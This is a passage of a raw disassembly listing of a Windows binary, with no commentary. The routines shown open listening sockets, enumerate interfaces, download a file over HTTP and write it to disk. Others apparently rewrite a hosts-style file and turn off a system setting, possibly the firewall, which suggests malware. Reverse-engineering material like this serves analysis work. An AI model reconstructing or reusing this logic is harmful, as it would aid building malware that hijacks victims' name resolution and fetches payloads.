push eax
mov dword_40F864, eax
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov dword_40FA7C, eax
jnz short loc_405886
mov dword_40FA7C, esi
loc_405886: ; CODE XREF: sub_4057EE+90�j
mov eax, dword_40FB34
push dword ptr [eax+30h]
push offset sub_4056AC
call sub_40A95F
mov [esp+2Ch+var_14], eax
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
add esp, 0Ch
test al, al
jz short loc_4058EF
mov eax, dword_40FB34
push esi
push esi
push esi
push esi
push 3
push dword ptr [eax+2Ch]
call sub_4095AA
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
add esp, 1Ch
jmp short loc_4058EB
; ---------------------------------------------------------------------------
loc_4058D5: ; CODE XREF: sub_4057EE+FF�j
push 14h
call dword_40FD68 ; Sleep
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
pop ecx
loc_4058EB: ; CODE XREF: sub_4057EE+E5�j
test al, al
jnz short loc_4058D5
loc_4058EF: ; CODE XREF: sub_4057EE+C0�j
mov edi, offset sub_4087B5
loc_4058F4: ; CODE XREF: sub_4057EE+1A7�j
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
test al, al
pop ecx
jnz short loc_405976
mov eax, dword_40FC20
mov ecx, dword_40FB34
and al, 1
neg al
sbb eax, eax
neg eax
add eax, 5
push dword ptr [ecx+eax*4]
call sub_40AE6F
mov ebp, eax
push esi
mov eax, edi
sub eax, dword_40FCB0
push ebp
push eax
call sub_406DB8
add esp, 10h
jmp short loc_405956
; ---------------------------------------------------------------------------
loc_40593B: ; CODE XREF: sub_4057EE+16A�j
push 14h
call dword_40FD68 ; Sleep
push esi
mov eax, edi
sub eax, dword_40FCB0
push ebp
push eax
call sub_406DB8
add esp, 0Ch
loc_405956: ; CODE XREF: sub_4057EE+14B�j
test al, al
jz short loc_40593B
jmp short loc_405964
; ---------------------------------------------------------------------------
loc_40595C: ; CODE XREF: sub_4057EE+186�j
push 14h
call dword_40FD68 ; Sleep
loc_405964: ; CODE XREF: sub_4057EE+16C�j
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
test al, al
pop ecx
jz short loc_40595C
loc_405976: ; CODE XREF: sub_4057EE+116�j
push ebx
call sub_409EB5
pop ecx
push 64h
call dword_40FD68 ; Sleep
push 32h
push dword_40F868
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_4058F4
mov eax, dword_40FB34
push esi
push esi
push esi
push esi
push 3
push dword ptr [eax+2Ch]
call sub_4095AA
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
add esp, 1Ch
pop edi
pop esi
pop ebp
pop ebx
jmp short loc_4059DA
; ---------------------------------------------------------------------------
loc_4059C4: ; CODE XREF: sub_4057EE+1EE�j
push 14h
call dword_40FD68 ; Sleep
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
pop ecx
loc_4059DA: ; CODE XREF: sub_4057EE+1D4�j
test al, al
jnz short loc_4059C4
push dword_40F868
call dword_40FDAC ; CloseHandle
push dword_40F86C
call dword_40FDAC ; CloseHandle
push dword_40FA7C
call dword_40FDAC ; CloseHandle
push dword_40FA78
call dword_40FDAC ; CloseHandle
push [esp+4+var_4]
mov eax, dword_40FB34
push dword ptr [eax+30h]
call sub_40AA42
add esp, 0Ch
retn
sub_4057EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A22 proc near ; CODE XREF: sub_40826C+61�p
; sub_40826C+86�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 6
push 1
push 2
call dword_40FCD4
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_405A87
lea eax, [ebp+var_10]
push 10h
push eax
call sub_40A94C
mov ax, [ebp+arg_0]
pop ecx
pop ecx
rol ax, 8
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
mov [ebp+var_10], 2
call dword_40FCD8
cmp eax, 0FFFFFFFFh
jz short loc_405A7B
push 0Ah
push esi
call dword_40FCDC
cmp eax, 0FFFFFFFFh
jnz short loc_405A87
loc_405A7B: ; CODE XREF: sub_405A22+49�j
push esi
call dword_40FCC0
or eax, 0FFFFFFFFh
jmp short loc_405A89
; ---------------------------------------------------------------------------
loc_405A87: ; CODE XREF: sub_405A22+18�j
; sub_405A22+57�j
mov eax, esi
loc_405A89: ; CODE XREF: sub_405A22+63�j
pop esi
leave
retn
sub_405A22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A8C proc near ; CODE XREF: sub_405B22+1C�p
; sub_407A35+34�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10Ch
mov ecx, [ebp+arg_C]
push esi
mov eax, ecx
xor edx, edx
mov esi, 3E8h
div esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
inc esi
mov [ebp+var_10C], esi
mov [ebp+var_108], edi
mov [ebp+var_8], eax
imul eax, 3E8h
sub ecx, eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push 0
mov [ebp+var_4], ecx
call dword_40FCF4
cmp eax, esi
jz short loc_405AE4
xor eax, eax
jmp short loc_405AF3
; ---------------------------------------------------------------------------
loc_405AE4: ; CODE XREF: sub_405A8C+52�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call dword_40FCEC
loc_405AF3: ; CODE XREF: sub_405A8C+56�j
pop edi
pop esi
leave
retn
sub_405A8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AF7 proc near ; CODE XREF: sub_407A35+5B�p
; sub_407A35+7E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push eax
push eax
xor ecx, ecx
cmp byte ptr [ebp+arg_4], al
push eax
push 4
setz cl
lea eax, [ebp+arg_4]
push eax
push 8004667Eh
push [ebp+arg_0]
mov [ebp+arg_4], ecx
call dword_40FCF0
pop ebp
retn
sub_405AF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B22 proc near ; CODE XREF: sub_407BDB+2A�p
; sub_407BDB+127�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
cmp [ebp+arg_8], esi
mov [ebp+var_1], 0
jle short loc_405B5E
loc_405B32: ; CODE XREF: sub_405B22+3A�j
push [ebp+arg_C]
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call sub_405A8C
add esp, 10h
cmp eax, 1
jl short loc_405B63
mov al, [ebp+var_1]
mov ecx, [ebp+arg_4]
mov [esi+ecx], al
inc esi
cmp al, 0Ah
jz short loc_405B5E
cmp esi, [ebp+arg_8]
jl short loc_405B32
loc_405B5E: ; CODE XREF: sub_405B22+E�j
; sub_405B22+35�j
mov eax, esi
loc_405B60: ; CODE XREF: sub_405B22+44�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_405B63: ; CODE XREF: sub_405B22+27�j
or eax, 0FFFFFFFFh
jmp short loc_405B60
sub_405B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_405B68 proc near ; CODE XREF: sub_407BDB:loc_408060�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 10Ch
push ebx
mov ebx, [ebp+6Ch+arg_0]
push esi
xor esi, esi
push edi
mov edi, [ebp+6Ch+arg_4]
mov [ebp+6Ch+var_8], 118h
mov [ebp+6Ch+var_4], esi
jmp short loc_405BD4
; ---------------------------------------------------------------------------
loc_405B8A: ; CODE XREF: sub_405B68+6A�j
dec [ebp+6Ch+var_10C]
mov eax, [ebp+6Ch+var_10C]
mov eax, [ebp+eax*4+6Ch+var_108]
cmp eax, edi
mov [ebp+6Ch+arg_4], ebx
jz short loc_405BA7
mov [ebp+6Ch+arg_4], edi
loc_405BA7: ; CODE XREF: sub_405B68+3A�j
push esi
push 1000h
push [ebp+6Ch+arg_8]
push eax
call dword_40FCEC
cmp eax, 1
jl short loc_405C03
push esi
push eax
push [ebp+6Ch+arg_8]
push [ebp+6Ch+arg_4]
call dword_40FCBC
jmp short loc_405BFE
; ---------------------------------------------------------------------------
loc_405BCC: ; CODE XREF: sub_405B68+99�j
cmp [ebp+6Ch+var_10C], esi
jnz short loc_405B8A
loc_405BD4: ; CODE XREF: sub_405B68+20�j
lea eax, [ebp+6Ch+var_8]
push eax
push esi
push esi
lea eax, [ebp+6Ch+var_10C]
push eax
push esi
mov [ebp+6Ch+var_10C], 2
mov [ebp+6Ch+var_108], edi
mov [ebp+6Ch+var_104], ebx
call dword_40FCF4
loc_405BFE: ; CODE XREF: sub_405B68+62�j
cmp eax, 1
jge short loc_405BCC
loc_405C03: ; CODE XREF: sub_405B68+52�j
pop edi
pop esi
pop ebx
add ebp, 6Ch
leave
retn
sub_405B68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C0B proc near ; CODE XREF: sub_405C60+44�p
; sub_4063D8+1D2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
cmp [ebp+arg_8], esi
jbe short loc_405C57
loc_405C17: ; CODE XREF: sub_405C0B+4A�j
cmp [ebp+arg_C], 0
jz short loc_405C2C
push 0
push [ebp+arg_C]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_405C5C
loc_405C2C: ; CODE XREF: sub_405C0B+10�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_8]
sub eax, esi
push eax
mov eax, [ebp+arg_4]
add eax, esi
push eax
push [ebp+arg_0]
call dword_40FB54
test eax, eax
jz short loc_405C5C
cmp [ebp+var_4], 0
jz short loc_405C57
add esi, [ebp+var_4]
cmp esi, [ebp+arg_8]
jb short loc_405C17
loc_405C57: ; CODE XREF: sub_405C0B+A�j
; sub_405C0B+42�j
mov eax, esi
loc_405C59: ; CODE XREF: sub_405C0B+53�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_405C5C: ; CODE XREF: sub_405C0B+1F�j
; sub_405C0B+3C�j
xor eax, eax
jmp short loc_405C59
sub_405C0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C60 proc near ; CODE XREF: sub_4061D1+100�p
; .text:0040C341�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push 0
push 84043300h
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FB44
test eax, eax
mov [ebp+var_4], eax
jnz short loc_405C84
leave
retn
; ---------------------------------------------------------------------------
loc_405C84: ; CODE XREF: sub_405C60+20�j
push esi
push edi
push [ebp+arg_C]
xor edi, edi
call sub_4092F9
test eax, eax
mov esi, [ebp+arg_8]
pop ecx
mov [esi], eax
jz short loc_405CBC
push [ebp+arg_10]
push [ebp+arg_C]
push eax
push [ebp+var_4]
call sub_405C0B
mov edi, eax
add esp, 10h
test edi, edi
jnz short loc_405CBC
push dword ptr [esi]
call sub_409317
and [esi], edi
pop ecx
loc_405CBC: ; CODE XREF: sub_405C60+38�j
; sub_405C60+50�j
push [ebp+var_4]
call dword_40FB40
mov eax, edi
pop edi
pop esi
leave
retn
sub_405C60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CCB proc near ; CODE XREF: sub_403723+1B�p
; sub_405DBF+29�p
var_410 = byte ptr -410h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
xor ebx, ebx
push ebx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push 20000013h
push [ebp+arg_0]
mov [ebp+var_8], 4
mov [ebp+var_C], ebx
call dword_40FB60
test eax, eax
jz loc_405DB9
cmp [ebp+var_C], 0C8h
jnz loc_405DB9
push ebx
push 80h
push 2
push ebx
push ebx
push 40000000h
push [ebp+arg_4]
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_405DB9
mov [ebp+var_1], bl
loc_405D34: ; CODE XREF: sub_405CCB+C6�j
push ebx
push [ebp+arg_8]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_405D5F
lea eax, [ebp+var_8]
push eax
push 400h
lea eax, [ebp+var_410]
push eax
push [ebp+arg_0]
call dword_40FB54
test eax, eax
jnz short loc_405D63
loc_405D5F: ; CODE XREF: sub_405CCB+75�j
mov [ebp+var_1], 1
loc_405D63: ; CODE XREF: sub_405CCB+92�j
cmp [ebp+var_8], ebx
jz short loc_405D93
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
lea eax, [ebp+var_410]
push eax
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jz short loc_405D8A
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jz short loc_405D8E
loc_405D8A: ; CODE XREF: sub_405CCB+B5�j
mov [ebp+var_1], 1
loc_405D8E: ; CODE XREF: sub_405CCB+BD�j
cmp [ebp+var_1], bl
jz short loc_405D34
loc_405D93: ; CODE XREF: sub_405CCB+9B�j
push esi
call dword_40FE00 ; FlushFileBuffers
push esi
call dword_40FDAC ; CloseHandle
cmp [ebp+var_1], bl
jz short loc_405DAF
push [ebp+arg_4]
call sub_409B2C
pop ecx
loc_405DAF: ; CODE XREF: sub_405CCB+D9�j
xor eax, eax
cmp [ebp+var_1], bl
setz al
jmp short loc_405DBB
; ---------------------------------------------------------------------------
loc_405DB9: ; CODE XREF: sub_405CCB+30�j
; sub_405CCB+3D�j ...
xor al, al
loc_405DBB: ; CODE XREF: sub_405CCB+EC�j
pop esi
pop ebx
leave
retn
sub_405CCB endp
; =============== S U B R O U T I N E =======================================
sub_405DBF proc near ; CODE XREF: sub_403723+19C�p
; sub_407164+83�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
xor ebx, ebx
push ebx
push 84043300h
push ebx
push ebx
push [esp+18h+arg_8]
push [esp+1Ch+arg_0]
call dword_40FB44
mov esi, eax
cmp esi, ebx
jz short loc_405DF9
push [esp+8+arg_C]
push [esp+0Ch+arg_4]
push esi
call sub_405CCB
add esp, 0Ch
push esi
mov bl, al
call dword_40FB40
loc_405DF9: ; CODE XREF: sub_405DBF+1E�j
pop esi
mov al, bl
pop ebx
retn
sub_405DBF endp
; =============== S U B R O U T I N E =======================================
sub_405DFE proc near ; CODE XREF: sub_4061D1+91�p
; sub_40E758+294�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, [eax+4]
cmp dl, 0Ah
jz short loc_405E35
cmp dl, 0C0h
jnz short loc_405E15
cmp byte ptr [eax+5], 0A8h
jz short loc_405E35
loc_405E15: ; CODE XREF: sub_405DFE+F�j
cmp dl, 0ACh
jnz short loc_405E27
mov cl, [eax+5]
cmp cl, 0Fh
jbe short loc_405E27
cmp cl, 20h
jb short loc_405E35
loc_405E27: ; CODE XREF: sub_405DFE+1A�j
; sub_405DFE+22�j
cmp dl, 7Fh
jnz short loc_405E32
cmp byte ptr [eax+5], 0
jz short loc_405E35
loc_405E32: ; CODE XREF: sub_405DFE+2C�j
xor al, al
retn
; ---------------------------------------------------------------------------
loc_405E35: ; CODE XREF: sub_405DFE+A�j
; sub_405DFE+15�j ...
mov al, 1
retn
sub_405DFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E38 proc near ; CODE XREF: sub_403723+217�p
var_22C = byte ptr -22Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push edi
push 1
push 25h
lea eax, [ebp+var_22C]
push eax
xor ebx, ebx
push ebx
call dword_40FBA8
mov eax, dword_40FB34
push dword ptr [eax+180h]
lea eax, [ebp+var_22C]
push eax
push eax
call dword_40FC8C
push ebx
push ebx
push 4
push ebx
push 1
push 0C0000000h
lea eax, [ebp+var_22C]
push eax
call dword_40FDC0 ; CreateFileW
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_406144
push esi
push ebx
push edi
call dword_40FDFC ; GetFileSize
push eax
mov [ebp+var_8], eax
call sub_4092F9
mov esi, eax
cmp esi, ebx
pop ecx
mov [ebp+var_24], esi
jz loc_40613A
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+var_8]
push esi
push edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_406131
lea eax, [ebp+var_8]
push eax
push [ebp+var_8]
push esi
call sub_40B34D
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_406131
mov eax, [ebp+arg_0]
mov [ebp+var_20], eax
loc_405EF0: ; CODE XREF: sub_405E38+1BC�j
push 1
push [ebp+var_20]
call sub_408CD4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_18], eax
jz loc_405FFA
cmp byte ptr [eax], 21h
jnz short loc_405F10
inc eax
mov [ebp+var_18], eax
loc_405F10: ; CODE XREF: sub_405E38+D2�j
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_10], eax
jbe loc_405FE3
loc_405F1E: ; CODE XREF: sub_405E38+1A5�j
mov ecx, [ebp+var_14]
lea eax, [ecx+eax*4]
mov [ebp+var_1C], eax
mov eax, [eax]
cmp eax, ebx
jz loc_405FD3
mov esi, eax
loc_405F33: ; CODE XREF: sub_405E38+106�j
mov al, [esi]
cmp al, 20h
jz short loc_405F3D
cmp al, 9
jnz short loc_405F40
loc_405F3D: ; CODE XREF: sub_405E38+FF�j
inc esi
jmp short loc_405F33
; ---------------------------------------------------------------------------
loc_405F40: ; CODE XREF: sub_405E38+103�j
mov al, [esi]
cmp al, 23h
jz loc_405FD3
cmp al, 0Dh
jz loc_405FD3
cmp al, 0Ah
jz short loc_405FD3
test al, al
jz short loc_405FD3
jmp short loc_405F6B
; ---------------------------------------------------------------------------
loc_405F5C: ; CODE XREF: sub_405E38+135�j
cmp al, 20h
jz short loc_405F6F
cmp al, 9
jz short loc_405F6F
test al, al
jz short loc_405FD3
inc esi
mov al, [esi]
loc_405F6B: ; CODE XREF: sub_405E38+122�j
cmp al, 9
jnz short loc_405F5C
loc_405F6F: ; CODE XREF: sub_405E38+126�j
; sub_405E38+12A�j
cmp [esi], bl
jz short loc_405FD3
loc_405F73: ; CODE XREF: sub_405E38+146�j
mov al, [esi]
cmp al, 9
jz short loc_405F7D
cmp al, 20h
jnz short loc_405F80
loc_405F7D: ; CODE XREF: sub_405E38+13F�j
inc esi
jmp short loc_405F73
; ---------------------------------------------------------------------------
loc_405F80: ; CODE XREF: sub_405E38+143�j
mov al, [esi]
cmp al, 23h
jz short loc_405FD3
cmp al, 0Dh
jz short loc_405FD3
cmp al, 0Ah
jz short loc_405FD3
test al, al
jz short loc_405FD3
push [ebp+var_18]
call dword_40FD94 ; lstrlenA
mov edi, eax
push edi
push edi
push esi
push [ebp+var_18]
call sub_408F6D
add esp, 10h
test eax, eax
jnz short loc_405FD3
mov al, [edi+esi]
cmp al, 20h
jz short loc_405FC6
cmp al, 0Dh
jz short loc_405FC6
cmp al, 0Ah
jz short loc_405FC6
cmp al, 23h
jz short loc_405FC6
test al, al
jnz short loc_405FD3
loc_405FC6: ; CODE XREF: sub_405E38+17C�j
; sub_405E38+180�j ...
mov esi, [ebp+var_1C]
push dword ptr [esi]
call sub_409317
pop ecx
mov [esi], ebx
loc_405FD3: ; CODE XREF: sub_405E38+F3�j
; sub_405E38+10C�j ...
mov eax, [ebp+var_10]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_10], eax
jb loc_405F1E
loc_405FE3: ; CODE XREF: sub_405E38+E0�j
push 2
push [ebp+var_20]
call sub_408CD4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_20], eax
jnz loc_405EF0
loc_405FFA: ; CODE XREF: sub_405E38+C9�j
or [ebp+var_10], 0FFFFFFFFh
push ebx
push ebx
push ebx
push [ebp+var_4]
call dword_40FDC8 ; SetFilePointer
push [ebp+var_4]
call dword_40FDF8 ; SetEndOfFile
xor esi, esi
cmp [ebp+var_8], ebx
jbe short loc_406047
loc_40601A: ; CODE XREF: sub_405E38+20D�j
mov eax, [ebp+var_14]
lea edi, [eax+esi*4]
mov eax, [edi]
cmp eax, ebx
jz short loc_406041
push ebx
lea ecx, [ebp+var_C]
push ecx
push eax
mov [ebp+var_10], esi
call dword_40FD94 ; lstrlenA
push eax
push dword ptr [edi]
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
loc_406041: ; CODE XREF: sub_405E38+1EC�j
inc esi
cmp esi, [ebp+var_8]
jb short loc_40601A
loc_406047: ; CODE XREF: sub_405E38+1E0�j
mov edi, [ebp+arg_0]
mov esi, offset dword_401314
loc_40604F: ; CODE XREF: sub_405E38+2DD�j
push 1
push edi
call sub_408CD4
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40611B
cmp byte ptr [ebx], 21h
jz loc_406107
cmp edi, [ebp+arg_0]
jnz short loc_4060AF
mov eax, [ebp+var_10]
cmp eax, 0FFFFFFFFh
jz short loc_4060AF
mov ecx, [ebp+var_14]
lea eax, [ecx+eax*4]
push dword ptr [eax]
mov [ebp+var_1C], eax
call dword_40FD94 ; lstrlenA
test eax, eax
mov [ebp+var_C], eax
jz short loc_4060AF
mov ecx, [ebp+var_1C]
mov ecx, [ecx]
cmp byte ptr [ecx+eax-1], 0Ah
jz short loc_4060AF
push 0
lea eax, [ebp+var_C]
push eax
push 2
push esi
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
loc_4060AF: ; CODE XREF: sub_405E38+237�j
; sub_405E38+23F�j ...
push 0
lea eax, [ebp+var_C]
push eax
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
push 0
lea eax, [ebp+var_C]
push eax
push 1
push offset asc_401288 ; " "
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
push 0
lea eax, [ebp+var_C]
push eax
push ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
push 0
lea eax, [ebp+var_C]
push eax
push 2
push esi
push [ebp+var_4]
call dword_40FDF0 ; WriteFile
loc_406107: ; CODE XREF: sub_405E38+22E�j
push 2
push edi
call sub_408CD4
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz loc_40604F
loc_40611B: ; CODE XREF: sub_405E38+225�j
push [ebp+var_4]
call dword_40FE00 ; FlushFileBuffers
push [ebp+var_8]
push [ebp+var_14]
call sub_4093AC
pop ecx
pop ecx
loc_406131: ; CODE XREF: sub_405E38+91�j
; sub_405E38+AC�j
push [ebp+var_24]
call sub_409317
pop ecx
loc_40613A: ; CODE XREF: sub_405E38+79�j
push [ebp+var_4]
call dword_40FDAC ; CloseHandle
pop esi
loc_406144: ; CODE XREF: sub_405E38+59�j
pop edi
pop ebx
leave
retn
sub_405E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406148 proc near ; CODE XREF: sub_4087B5+E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
lea eax, [ebp+var_10]
push eax
push offset dword_401328
push 1
xor ebx, ebx
push ebx
push offset dword_401318
call dword_40FC68
test eax, eax
jnz short loc_4061CC
mov eax, [ebp+var_10]
mov ecx, [eax]
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+1Ch]
test eax, eax
jnz short loc_4061C3
mov eax, [ebp+var_C]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push eax
call dword ptr [ecx+1Ch]
test eax, eax
jnz short loc_4061BA
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+20h]
test eax, eax
jnz short loc_4061B1
cmp [ebp+var_4], bx
jz short loc_4061B1
mov eax, [ebp+var_8]
mov ecx, [eax]
push ebx
push eax
call dword ptr [ecx+24h]
mov bl, 1
loc_4061B1: ; CODE XREF: sub_406148+55�j
; sub_406148+5B�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4061BA: ; CODE XREF: sub_406148+44�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4061C3: ; CODE XREF: sub_406148+33�j
mov eax, [ebp+var_10]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4061CC: ; CODE XREF: sub_406148+22�j
mov al, bl
pop ebx
leave
retn
sub_406148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4061D1 proc near ; CODE XREF: sub_4089D8+3C�p
var_61C = byte ptr -61Ch
var_618 = byte ptr -618h
var_614 = byte ptr -614h
var_613 = byte ptr -613h
var_612 = byte ptr -612h
var_611 = byte ptr -611h
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 61Ch
push ebx
push esi
xor ebx, ebx
push ebx
push 2
push 2
call dword_40FCD4
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4061F7
xor al, al
jmp loc_40637F
; ---------------------------------------------------------------------------
loc_4061F7: ; CODE XREF: sub_4061D1+1D�j
push ebx
push ebx
lea eax, [ebp+var_C]
push eax
push 5F0h
lea eax, [ebp+var_61C]
push eax
push ebx
push ebx
push 4004747Fh
push esi
mov [ebp+var_C], ebx
call dword_40FCF0
push esi
call dword_40FCC0
mov eax, [ebp+var_C]
push 4Ch
xor edx, edx
pop ecx
div ecx
mov [ebp+var_2], 1
mov [ebp+var_10], ebx
mov [ebp+var_8], ebx
mov [ebp+var_1], bl
cmp eax, ebx
mov [ebp+var_C], eax
jbe loc_406379
push edi
mov edi, [ebp+arg_4]
xor esi, esi
loc_406249: ; CODE XREF: sub_4061D1+18E�j
imul esi, 4Ch
test [ebp+esi+var_61C], 1
jz loc_406355
lea eax, [ebp+esi+var_618]
push eax
call sub_405DFE
test al, al
pop ecx
jnz loc_406355
cmp [ebp+var_2], bl
jz loc_4062FB
lea eax, [ebp+var_14]
push eax
mov eax, dword_40FC1C
movzx ecx, byte ptr [eax+66h]
push ecx
movzx ecx, byte ptr [eax+64h]
lea eax, [ecx+eax+6Ch]
push eax
call sub_409A6F
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_4062F8
push eax
push [ebp+var_14]
call sub_40A747
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_18], eax
mov [ebp+var_8], ebx
jz short loc_4062EF
call dword_40FDE8 ; GetTickCount
mov [edi], eax
mov eax, dword_40FC1C
movzx eax, word ptr [eax+68h]
push ebx
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_18]
push [ebp+arg_0]
call sub_405C60
add esp, 14h
mov [ebp+var_8], eax
call dword_40FDE8 ; GetTickCount
sub eax, [edi]
push [ebp+var_18]
mov [edi], eax
call sub_409317
pop ecx
loc_4062EF: ; CODE XREF: sub_4061D1+E1�j
push [ebp+var_14]
call sub_409317
pop ecx
loc_4062F8: ; CODE XREF: sub_4061D1+CC�j
mov [ebp+var_2], bl
loc_4062FB: ; CODE XREF: sub_4061D1+A2�j
cmp [ebp+var_8], ebx
jz short loc_406378
movzx eax, [ebp+esi+var_611]
push eax
movzx eax, [ebp+esi+var_612]
push eax
movzx eax, [ebp+esi+var_613]
push eax
movzx eax, [ebp+esi+var_614]
push eax
mov eax, dword_40FB34
push dword ptr [eax+84h]
lea eax, [ebp+var_2C]
push 14h
push eax
call dword_40FC88
push ebx
push ebx
push ebx
push [ebp+var_8]
push [ebp+var_10]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_408CFB
add esp, 38h
test al, al
jnz short loc_406367
loc_406355: ; CODE XREF: sub_4061D1+83�j
; sub_4061D1+99�j
inc [ebp+var_1]
movzx esi, [ebp+var_1]
cmp esi, [ebp+var_C]
jb loc_406249
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406367: ; CODE XREF: sub_4061D1+182�j
mov [ebp+var_C], ebx
